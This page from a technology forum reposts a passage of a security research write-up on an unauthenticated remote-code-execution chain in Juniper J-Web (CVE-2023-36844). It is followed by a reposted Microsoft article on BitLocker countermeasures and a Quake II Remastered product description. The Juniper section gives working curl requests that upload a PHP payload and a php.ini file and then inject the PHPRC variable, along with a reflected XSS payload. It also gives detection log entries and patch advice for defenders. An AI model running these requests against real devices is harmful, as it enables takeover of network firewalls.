Well, it turns out that Juniper is (wisely) using a tool named veriexec, which will limit execution to binaries which have a valid signature - and also verify their location on the filesystem. This means that attempts to upload and execute a payload will fail, since our payloads will be located in a location not whitelisted (and also because they are not cryptographically signed). Great for security, but bad for us - what now? How can we get RCE without the ability to execute any of our own binaries?!
We don't need no steenkin' binaries

The answer, of course, is to use the binaries that are already on the system. While the system is (sensibly) quite minimal, presumably to prevent exactly this kind of attack, there is still one behemoth of an executable at our disposal - PHP itself. The question then becomes, "How can we direct PHP to execute arbitrary code using only environment variables?"
Well, as you can see in the LD_DEBUG output above, we are influencing the execution of /usr/bin/php. Therefore, we dug into environmental variables that can be used to influence the PHP binary at execution.
We soon realised that we could use the PHPRC environment variable, which instructs PHP on where to locate its configuration file, usually called php.ini. We can use our first bug to upload our own configuration file, and use PHPRC to point PHP at it. The PHP runtime will then duly load our file, which then contains an auto_prepend_file entry, specifying a second file, also uploaded using our first bug. This second file contains normal PHP code, which is then executed by the PHP runtime before any other code.
So, in more detail, our bug chain becomes:
1) Use bug #1 (the do_upload bug) to upload a PHP file containing our shellcode
2) Use bug #1 to upload a second file, containing an auto_prepend_file directive instructing the PHP preprocessor to execute the file we uploaded in step 1
3) Use bug #2 to set the PHPRC variable to the file we uploaded in step 2.
Et voilà! RCE!
Here's a complete example chain.
First, upload our PHP file. In this case, we'll just upload a phpinfo script. Since the do_upload operation expects the file contents to be base64-encoded, we'll do that!
$ cat payload.php <?php phpinfo(); ?> $ base64 < payload.php PD9waHAgDQpwaHBpbmZvKCk7DQo/Pg== $ curl --insecure https://xxxxxxx/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "test.php", "fileData": ",PD9waHAgDQpwaHBpbmZvKCk7DQo/Pg==", "csize": 22}]' +:{"converted_fileName": {0: '7079310541ded7b00eae61d26427a997f956cd68a2836dde21e6b53406106bda.php'}, "original_fileName": {0: 'test.php'}} $ Great, now we have our PHP file uploaded as 7079310541ded7b00eae61d26427a997f956cd68a2836dde21e6b53406106bda.php. Our 'step 1' is complete - now to upload the new php.ini configuration file.
$ cat php.ini auto_prepend_file="/var/tmp/7079310541ded7b00eae61d26427a997f956cd68a2836dde21e6b53406106bda.php" $ base64 < php.ini YXV0b19wcmVwZW5kX2ZpbGU9Ii92YXIvdG1wLzcwNzkzMTA1NDFkZWQ3YjAwZWFlNjFkMjY0Mjdh OTk3Zjk1NmNkNjhhMjgzNmRkZTIxZTZiNTM0MDYxMDZiZGEucGhwIg== $ curl --insecure https://xxxxxxx/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "php.ini", "fileData": ",YXV0b19wcmVwZW5kX2ZpbGU9Ii92YXIvdG1wLzcwNzkzMTA1NDFkZWQ3YjAwZWFlNjFkMjY0MjdhOTk3Zjk1NmNkNjhhMjgzNmRkZTIxZTZiNTM0MDYxMDZiZGEucGhwIg==", "csize": 97}]' +:{"converted_fileName": {0: '0c1de7614b936d72deebd90a99a6885960102ba051ab02e598ec209566e2a820.ini'}, "original_fileName": {0: 'php.ini'}} Okay, so far so good - we have our configuration file stored as 0c1de7614b936d72deebd90a99a6885960102ba051ab02e598ec209566e2a820.ini. The last peice of the puzzle is to inject the PHPRC environment variable using our second bug:
$ curl -X POST --insecure https://xxxxxx/webauth_operation.php -F "PHPRC=/tmp/0c1de7614b936d72deebd90a99a6885960102ba051ab02e598ec209566e2a820.ini" Our reward is the PHPinfo output, as we expect.
Never have I been so happy to see a phpinfo page
Of course, making three HTTP requests is tedious, and so we've automated the process and wrapped it up in a nice exploit available on our GitHub.
Other bits and bobs
While searching through the $internal_operations functions, we found a few other things that were perhaps not as earth-shattering as RCE, but speak to the quality of the codebase. We noted trivial reflected XSS in a few endpoints, such as emit_debug_note and sajax_show_one_stub, which would simply format and echo their parameters with the all-important Content-Type: text/html header set, allowing a really easy XSS for any attacker who cares to make a cursory glance over the code:
function emit_debug_note (&$debug_back_trace, $label = '', $as_comment = false) { if ($as_comment == true) { print "\n\n"; } } One would expect that a 'hardened' appliance such as a next-generation firewall or switch would avoid such obvious flaws. Simply specifying a body of rs=emit_debug_note&rsargs[]=1,&rsargs[]=<script>alert('watchTowr says hi')</script>" is enough to pop a message box - no fancy filter evasion required. Classy.
1990 called, it wants it's coding standards back
I guess we'll apply for CVEs for these at some point - but hardly earth-shattering.
Aftermath
We hope this painstaking research is useful to administrators who want more information about the vulnerabilities before deciding if they should patch, and (should they decide to) that it is also useful for those who need to verify that patches have been applied.
We carried out this research using an EC2-hosted SRX device, and were dismayed to find that it is seemingly impossible for us to actually patch the device to latest. Updates are only available to registered users, and it seems that the EC2 integration which performs registration is faulty.
No updates for us.
Of course, we're directed to contact support, which is impossible without.. a registered account. D'Oh!
If you find yourself in a similar situation, or if you'd rather not patch for some reason, we suggest following Juniper's advice to disable the J-Web service completely, or restrict it to (very) trusted users.
Those who have not yet patched and are concerned about the integrity of their systems may wish to check the PHP log files on the appliance, looking for messages similar to the following:
[24-Aug-2023 13:47:29 America/Los_Angeles] Array ( [type] => 8 [message] => Trying to access array offset on value of type null [file] => /html/core/session.php [line] => 47 ) This error message is a direct result of anonymous access without a valid session, and while not conclusive, may indicate an attack is being attempted. Another item that may be of interest to defenders is the following:
[24-Aug-2023 07:23:38 America/Los_Angeles] CACHING FLOW: query user not set.. This entry, while not indicative of a successful attack, suggests that an action has been attempted via an API endpoint without supplying authentication information, as a possible consequence of an attacker exploring the API to discover useful functionality. An example of an action that causes this message is the move_item operation (see above).
Given the simplicity of exploitation, and the privileged position that JunOS devices hold in a network, we would not be surprised to see large-scale exploitation.
Proof of Concept
Alas, because we enjoyed exploiting this chain of vulnerabilities to achieve unauthenticated RCE so much, we've published our PoC:
https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844

Closing words
This is an interesting bug chain, utilising two bugs that would be near-useless in isolation and combining them for a 'world ending' unauthenticated RCE.
While the quality of the code is much aligned with other devices in its class, such as the Fortiguard and Sonicwall devices we've been breaking, it is worth pointing out here that Juniper's use of veriexec was a wise move, as it complicates code and command execution. However, it is not enough to prevent determined attackers - watchTowr researchers took around half an hour to circumvent it (and, I'll admit, much longer to realise it was in effect).
Those running an affected device are urged to update to a patched version at their earliest opportunity, and/or to disable access to the J-Web interface if at all possible.

Source : https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
PoC : https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844

Read more...
0 comments
110 views

BitLocker Countermeasures

By SeedTheNet, in Security, August 29, 2023

BitLocker Countermeasures
Windows uses technologies including trusted platform module (TPM), secure boot, and measured boot to help protect BitLocker encryption keys against attacks. BitLocker is part of a strategic approach to securing data against offline attacks through encryption technology. Data on a lost or stolen computer is vulnerable. For example, there could be unauthorized access, either by running a software attack tool against the computer or by transferring the computer's hard disk to a different computer.
BitLocker helps mitigate unauthorized data access on lost or stolen computers before the authorized operating system is started. This mitigation is done by:
Encrypting volumes on a computer. For example, BitLocker can be turned on for the operating system volume, a volume on a fixed drive. or removable data drive (such as a USB flash drive, SD card, etc.) Turning on BitLocker for the operating system volume encrypts all system files on the volume, including the paging files and hibernation files. The only exception is for the System partition, which includes the Windows Boot Manager and minimal boot collateral required for decryption of the operating system volume after the key is unsealed.
Ensuring the integrity of early boot components and boot configuration data. On devices that have a TPM version 1.2 or higher, BitLocker uses the enhanced security capabilities of the TPM to make data accessible only if the computer's BIOS firmware code and configuration, original boot sequence, boot components, and BCD configuration all appear unaltered and the encrypted disk is located in the original computer. On systems that use TPM PCR[7], BCD setting changes deemed safe are permitted to improve usability.
The next sections provide more details about how Windows protects against various attacks on the BitLocker encryption keys in Windows 11, Windows 10, Windows 8.1, and Windows 8.
For more information about how to enable the best overall security configuration for devices beginning with Windows 10 version 1803, see Standards for a highly secure Windows device.
Protection before startup
Before Windows starts, security features implemented as part of the device hardware and firmware must be relied on, including TPM and secure boot. Fortunately, many modern computers feature a TPM and secure boot.
Trusted Platform Module
A trusted platform module (TPM) is a microchip designed to provide basic security-related functions, primarily involving encryption keys. On some platforms, TPM can alternatively be implemented as a part of secure firmware. BitLocker binds encryption keys with the TPM to ensure that a computer hasn't been tampered with while the system was offline. For more info about TPM, see Trusted Platform Module.
UEFI and secure boot
Unified Extensible Firmware Interface (UEFI) is a programmable boot environment that initializes devices and starts the operating system's bootloader.
The UEFI specification defines a firmware execution authentication process called Secure Boot. Secure Boot blocks untrusted firmware and bootloaders (signed or unsigned) from being able to start on the system.
By default, BitLocker provides integrity protection for Secure Boot by utilizing the TPM PCR[7] measurement. An unauthorized EFI firmware, EFI boot application, or bootloader can't run and acquire the BitLocker key.
BitLocker and reset attacks
To defend against malicious reset attacks, BitLocker uses the TCG Reset Attack Mitigation, also known as MOR bit (Memory Overwrite Request), before extracting keys into memory.
Note
This does not protect against physical attacks where an attacker opens the case and attacks the hardware.
Security policies
The next sections cover pre-boot authentication and DMA policies that can provide additional protection for BitLocker.
Pre-boot authentication
Pre-boot authentication with BitLocker is a policy setting that requires the use of either user input, such as a PIN, a startup key, or both to authenticate prior to making the contents of the system drive accessible. The Group Policy setting is Require additional authentication at startup and the corresponding setting in the BitLocker CSP is SystemDrivesRequireStartupAuthentication.
BitLocker accesses and stores the encryption keys in memory only after pre-boot authentication is completed. If Windows can't access the encryption keys, the device can't read or edit the files on the system drive. The only option for bypassing pre-boot authentication is entering the recovery key.
Pre-boot authentication is designed to prevent the encryption keys from being loaded to system memory without the trusted user supplying another authentication factor such as a PIN or startup key. This feature helps mitigate DMA and memory remanence attacks.
On computers with a compatible TPM, operating system drives that are BitLocker-protected can be unlocked in four ways:
TPM-only. Using TPM-only validation doesn't require any interaction with the user to unlock and provide access to the drive. If the TPM validation succeeds, the user sign-in experience is the same as a standard sign-in. If the TPM is missing or changed or if BitLocker detects changes to the BIOS or UEFI code or configuration, critical operating system startup files, or the boot configuration, BitLocker enters recovery mode, and the user must enter a recovery password to regain access to the data. This option is more convenient for sign-in but less secure than the other options, which require an additional authentication factor.
TPM with startup key. In addition to the protection that the TPM-only provides, part of the encryption key is stored on a USB flash drive, referred to as a startup key. Data on the encrypted volume can't be accessed without the startup key.
TPM with PIN. In addition to the protection that the TPM provides, BitLocker requires that the user enters a PIN. Data on the encrypted volume can't be accessed without entering the PIN. TPMs also have anti-hammering protection that is designed to prevent brute force attacks that attempt to determine the PIN.
TPM with startup key and PIN. In addition to the core component protection that the TPM-only provides, part of the encryption key is stored on a USB flash drive, and a PIN is required to authenticate the user to the TPM. This configuration provides multifactor authentication so that if the USB key is lost or stolen, it can't be used for access to the drive, because the correct PIN is also required.
In the following group policy example, TPM + PIN is required to unlock an operating system drive:

Pre-boot authentication with a PIN can mitigate an attack vector for devices that use a bootable eDrive because an exposed eDrive bus can allow an attacker to capture the BitLocker encryption key during startup. Pre-boot authentication with a PIN can also mitigate DMA port attacks during the window of time between when BitLocker unlocks the drive and Windows boots to the point that Windows can set any port-related policies that have been configured.
On the other hand, Pre-boot authentication-prompts can be inconvenient to users. In addition, users who forget their PIN or lose their startup key are denied access to their data until they can contact their organization's support team to obtain a recovery key. Pre-boot authentication can also make it more difficult to update unattended desktops and remotely administered servers because a PIN needs to be entered when a computer reboots or resumes from hibernation.
To address these issues, BitLocker Network Unlock can be deployed. Network Unlock allows systems within the physical enterprise security perimeter that meet the hardware requirements and have BitLocker enabled with TPM+PIN to boot into Windows without user intervention. It requires direct ethernet connectivity to an enterprise Windows Deployment Services (WDS) server.
Protecting Thunderbolt and other DMA ports
There are a few different options to protect DMA ports, such as Thunderbolt™3. Beginning with Windows 10 version 1803, new Intel-based devices have kernel protection against DMA attacks via Thunderbolt™ 3 ports enabled by default. This Kernel DMA Protection is available only for new systems beginning with Windows 10 version 1803, as it requires changes in the system firmware and/or BIOS.
You can use the System Information desktop app MSINFO32.exe to check if a device has kernel DMA protection enabled:

If kernel DMA protection isn't enabled, follow these steps to protect Thunderbolt™ 3 enabled ports:
Require a password for BIOS changes
Intel Thunderbolt Security must be set to User Authorization in BIOS settings. Refer to Intel Thunderbolt™ 3 and Security on Microsoft Windows® 10 Operating System documentation
Additional DMA security may be added by deploying policy (beginning with Windows 10 version 1607 or Windows 11):
MDM: DataProtection/AllowDirectMemoryAccess policy
Group Policy: Disable new DMA devices when this computer is locked (This setting isn't configured by default.)
For Thunderbolt v1 and v2 (DisplayPort Connector), refer to the Thunderbolt Mitigation section in Blocking the SBP-2 driver and Thunderbolt controllers to reduce 1394 DMA and Thunderbolt DMA threats to BitLocker. For SBP-2 and 1394 (also known as Firewire), refer to the SBP-2 Mitigation section in Blocking the SBP-2 driver and Thunderbolt controllers to reduce 1394 DMA and Thunderbolt DMA threats to BitLocker.
Attack countermeasures
This section covers countermeasures for specific types of attacks.
Bootkits and rootkits
A physically present attacker might attempt to install a bootkit or rootkit-like piece of software into the boot chain in an attempt to steal the BitLocker keys. The TPM should observe this installation via PCR measurements, and the BitLocker key won't be released.
Note
BitLocker protects against this attack by default.
A BIOS password is recommended for defense-in-depth in case a BIOS exposes settings that may weaken the BitLocker security promise. Intel Boot Guard and AMD Hardware Verified Boot support stronger implementations of Secure Boot that provide additional resilience against malware and physical attacks. Intel Boot Guard and AMD Hardware Verified Boot are part of platform boot verification standards for a highly secure Windows device.
Brute force attacks against a PIN
Require TPM + PIN for anti-hammering protection.
DMA attacks
See Protecting Thunderbolt and other DMA ports earlier in this article.
Paging file, crash dump, and Hyberfil.sys attacks
These files are secured on an encrypted volume by default when BitLocker is enabled on OS drives. It also blocks automatic or manual attempts to move the paging file.
Memory remanence
Enable secure boot and mandatorily prompt a password to change BIOS settings. For customers requiring protection against these advanced attacks, configure a TPM+PIN protector, disable Standby power management, and shut down or hibernate the device before it leaves the control of an authorized user.
Tricking BitLocker to pass the key to a rogue operating system
An attacker might modify the boot manager configuration database (BCD) which is stored on a non-encrypted partition and add an entry point to a rogue operating system on a different partition. During the boot process, BitLocker code will make sure that the operating system that the encryption key obtained from the TPM is given to, is cryptographically verified to be the intended recipient. Because this strong cryptographic verification already exists, we don't recommend storing a hash of a disk partition table in Platform Configuration Register (PCR) 5.
An attacker might also replace the entire operating system disk while preserving the platform hardware and firmware and could then extract a protected BitLocker key blob from the metadata of the victim OS partition. The attacker could then attempt to unseal that BitLocker key blob by calling the TPM API from an operating system under their control. This will not succeed because when Windows seals the BitLocker key to the TPM, it does it with a PCR 11 value of 0, and to successfully unseal the blob, PCR 11 in the TPM must have a value of 0. However, when the boot manager passes the control to any boot loader (legitimate or rogue) it always changes PCR 11 to a value of 1. Since the PCR 11 value is guaranteed to be different after exiting the boot manager, the attacker can't unlock the BitLocker key.
Attacker countermeasures
The following sections cover mitigations for different types of attackers.
Attacker without much skill or with limited physical access
Physical access may be limited by a form factor that doesn't expose buses and memory. For example, there are no external DMA-capable ports, no exposed screws to open the chassis, and memory is soldered to the mainboard.
This attacker of opportunity doesn't use destructive methods or sophisticated forensics hardware/software.
Mitigation:
Pre-boot authentication set to TPM only (the default) Attacker with skill and lengthy physical access
Targeted attack with plenty of time; this attacker will open the case, will solder, and will use sophisticated hardware or software.
Mitigation:
Pre-boot authentication set to TPM with a PIN protector (with a sophisticated alphanumeric PIN [enhanced pin] to help the TPM anti-hammering mitigation).
-And-
Disable Standby power management and shut down or hibernate the device before it leaves the control of an authorized user. This configuration can be set using the following Group Policy:
Computer Configuration > Policies > Administrative Templates > Windows Components > File Explorer > Show hibernate in the power options menu
Computer Configuration > Policies > Administrative Templates > Power Management > Sleep Settings > Allow standby states (S1-S3) when sleeping (plugged in)
Computer Configuration > Policies > Administrative Templates > Power Management > Sleep Settings > Allow standby states (S1-S3) when sleeping (on battery)
Important
These settings are not configured by default.
For some systems, bypassing TPM-only may require opening the case, and may require soldering, but could possibly be done for a reasonable cost. Bypassing a TPM with a PIN protector would cost much more, and require brute forcing the PIN. With a sophisticated enhanced PIN, it could be nearly impossible. The Group Policy setting for enhanced PIN is:
Computer Configuration > Policies > Administrative Templates > Windows Components > BitLocker Drive Encryption > Operating System Drives > Allow enhanced PINs for startup Important
This setting is not configured by default.
For secure administrative workstations, Microsoft recommends a TPM with PIN protector and to disable Standby power management and shut down or hibernate the device.
Original Source
https://learn.microsoft.com/en-us/windows/security/operating-system-security/data-protection/bitlocker/bitlocker-countermeasures

Read more...
0 comments
132 views

Quake II Remastered

By SeedTheNet, in Gaming, August 20, 2023

You are humanity’s last hope to stop the Strogg, a hostile alien race waging war against Earth.
Play this military sci-fi FPS, now enhanced for modern platforms and feature-complete with all-new campaign content, Quake II 64, online multiplayer and co-op support, and more.
Features Experience the Military Sci-fi FPS,
Enhanced Get the Original Mission Packs: The Reckoning and Ground Zero Play the All-New Expansion “Call of the Machine”
Get Quake II 64 for Free
Enjoy Online & Local Multiplayer/CO-OP Play Together with Crossplay
https://store.steampowered.com/app/2320/Quake_II/

The legendary sci-fi action FPS is enhanced and now available on modern platforms!

Take the fight to the Strogg with our enhanced re-release of Quake II, now available on PlayStation 4, PlayStation 5, Xbox One, Xbox Series X|S and Nintendo Switch, in addition to PC platforms and Game Pass (subscription required). This re-release is our biggest effort yet with enhanced AI, gameplay improvements, presented in up to 120hz in 4K on supported platforms (see the below FAQ for details) and we even dug into the development archives of Quake II to restore elements that were cut from the original game’s conception.

Note: Steam users who already own Quake II will automatically receive the new version with a free download. Read the FAQ below for details on how to access the original version.
New Features and Improvements Includes the original Quake II campaign plus both Mission Packs, The Reckoning, Ground Zero, plus the previously Nintendo 64-exclusive Quake II 64 and the brand-new Call of the Machine episode from MachineGames Improvements to gameplay, including content restored from the original development, plus visual upgrades such as dynamic shadows, improved lighting, glow maps and more. Play local split-screen and online across four Multiplayer modes with crossplay functionality: Cooperative Deathmatch Team Deathmatch Capture the Flag Add AI opponents in Deathmatch and Team Deathmatch modes, explore the id Vault, enjoy improved co-op play and much more!
For a deeper dive into the technical enhancements we made in this re-release of Quake II, please check out this in depth article

Supported Languages
English, French, Italian, Spanish, German, Russian
RELEASE NOTES Enhanced Gameplay

The gameplay in Quake II has been shined to a polish to improve the feel of the game while keeping the original spirit intact. Weapon fire from players and enemies now have muzzle flashes to improve feedback and new damage indicators to better communicate to players where they are taking damage from. An increased tick rate ensures action is more responsive and hundreds of level and gameplay bugs have been fixed.

Upgraded AI

The forces of Stroggos are deadlier than ever with improved pathing, new attacks and new tactics. Enemies will hit the dirt to dodge shots and jump down off ledges to get a better angle, making enemy encounters more dynamic. Flying AI has been rebuilt to allow for better and more realistic navigation through the air. Watch out for the Berzerker’s new leap attack, restored from the game’s original development, and dodge Parasite tongue lashings which will now stick into the wall, temporarily stunning them.

Improved Lighting, Shadows & Models

Levels have been enhanced with improved lighting, along with updated weapon and enemy models. Dynamic shadows and lighting have been added to levels and weapon effects. New glow maps make computer terminals, power cores and other illuminated surfaces pop. These graphics settings and more can be customized through the in-game menus.

Includes Both Original Expansion Packs

This release of Quake II includes the original expansion packs, The Reckoning, and Ground Zero. All the AI enhancements from Ground Zero are now available in all episodes. Additionally, for the first time, Quake II 64 has been ported over, making this exclusive episode available in high resolution and high framerate with modern controls.

Brand New Episode: Call of the Machine

In the depths of Strogg space lies the Machine, a singularity capable of collapsing the fabric of reality. Fight across time and space to find the Strogg-Maker, destroy it and change humanity's destiny in the brand-new episode, Call of the Machine. Created by MachineGames, this follow-up to their Quake episode Dimension of the Machine is now available for both single player or in cooperative play.

Navigate With The Compass

Navigate your way through the vast hub-based worlds of Stroggos with a brand-new compass item that will direct you to your next objective, no matter where you are, with useful arrows dropped into the world.

Open the id Vault

For the first time, dive into the id Vault and explore concept art and gameplay footage of Quake II, including early versions of weapons, items and even playable levels from the game's original development.

Split-Screen and Online Multiplayer

Quake II includes 4-player split-screen local multiplayer on all platforms, with 8 player split-screen available on Xbox Series X|S and PC. Fight against your friends in Deathmatch, Team Deathmatch and Capture the Flag, or team up in Cooperative games available for all five campaigns. Fill out your slots with AI bots for both Deathmatch and Team Deathmatch modes.
For the genuine QuakeCon experience, LAN play is also supported across all platforms and Nintendo Switch players can frag locally through ad-hoc wireless multiplayer. Mix up your games with custom settings such as Instagib and random weapons to maximize your fun.

Crossplay

Play with friends no matter which platform they prefer. Crossplay is available on Game Pass, PC (with controller), Xbox One, Xbox Series X|S, PlayStation 4, PlayStation 5 and Nintendo Switch versions of the game, so you can play Quake II with everyone. Join your friends quickly using our room code system for finding lobbies.

Enhanced Cooperative Gameplay

Save games are now supported while playing cooperatively and new rules have been added to improve Quake II's Cooperative modes. If all players die, it's game over and the level will restart. Respawn your teammates by clearing all enemies in the area or finding a safe place to hide. Teammates will spawn near you, letting you get back into the fight quickly.
Create an additional challenge for you and your friends by setting a maximum lives limit or upping enemies' health. To help with communication, you can also ping areas in the map by using the “point” gesture that will be visible to all other players.

AI Bot Opponents

Quake II bots can be added to Deathmatch and Team Deathmatch modes in both offline and online matches. They are more aware of their surroundings, including danger, and can perform advanced maneuvers like rocket jumps. With six skill levels from Training to Nightmare, Quake II bots are fun for both beginner and experienced players.

ACCESSIBILITY FEATURES With this release of Quake II, we are adding new accessibility features so the game can be enjoyed by even more players. For a full rundown of the accessibility features offered, check out this article.

Accessibility Options Notification

After installing or updating the game for the first time, you will be presented with an Accessibility Options notification. Read through the available options to make sure they are set to your preference. Once in-game, these options can be altered from the Options/Accessibility sub-menu via the Main and Pause Menus

(Note: All Accessibility options default to ON during first launch after install, but can be easily toggled OFF/ON via Disable/Enable All Settings)

Accessibility Options

Read Chat Out Loud *

Enables synthesized voiceover of incoming multiplayer text chat.

Transcribe Voice Chat

Converts incoming voice chat into text in the multiplayer chat window

Speak For Me in Voice Chat *

Use text-to-speech on outgoing multiplayer chat, converting your text into a synthesized voice chat audible to other players
Voice profiles can be selected from the Accessibility menu when connected to an online multiplayer session. Note that the number of voice profiles may vary by language.

* Text-to-speech features not supported for menu interactions.

High Contrast

Changes the default text field backgrounds to improve User Interface legibility

High Contrast OFF

High Contrast ON

Alternate Typeface

Changes the original in-game font for added legibility

Alternate Typeface OFF

Alternate Typeface ON

Screen Flash Amount

Decreases opacity of onscreen effects to reduce flash intensity

Center Message Time

Changes the display duration of center print HUD messages

Corner Message Time

Changes the display duration of corner print HUD messages

Maximum Lines

Changes the maximum number of onscreen corner print HUD messages

Chat Message Time

Changes the display duration of multiplayer text chat messages

Read more...
0 comments
248 views

Sign In

October 10, 2023—KB5031361 (OS Build 17763.4974)

October 10, 2023—KB5031362 (OS Build 14393.6351)

Commandos: Origins is announced

Android 14 is rumored to be releasing tomorrow with Google Pixel 8

Counter Strike 2 is out , replaces CS:GO in Steam!

Vulnerability in Openfire messaging software allows unauthorized access to compromised servers - DrWeb report

September 12, 2023—KB5030216 (OS Build 20348.1970)

September 12, 2023—KB5030214 (OS Build 17763.4851)

September 12, 2023—KB5030213 (OS Build 14393.6252)

Rockstar selling you cracked copies on Steam

Deprecated features for Windows client - Microsoft is retiring Wordpad after 28 years

Mimimi Games Shutting Down

CVE-2023-36844 And Friends: RCE In Juniper Devices - WatchTowr Labs

BitLocker Countermeasures

Quake II Remastered

Member Statistics

Categories

Records

Files

Topics

Browse

Activity

Important Information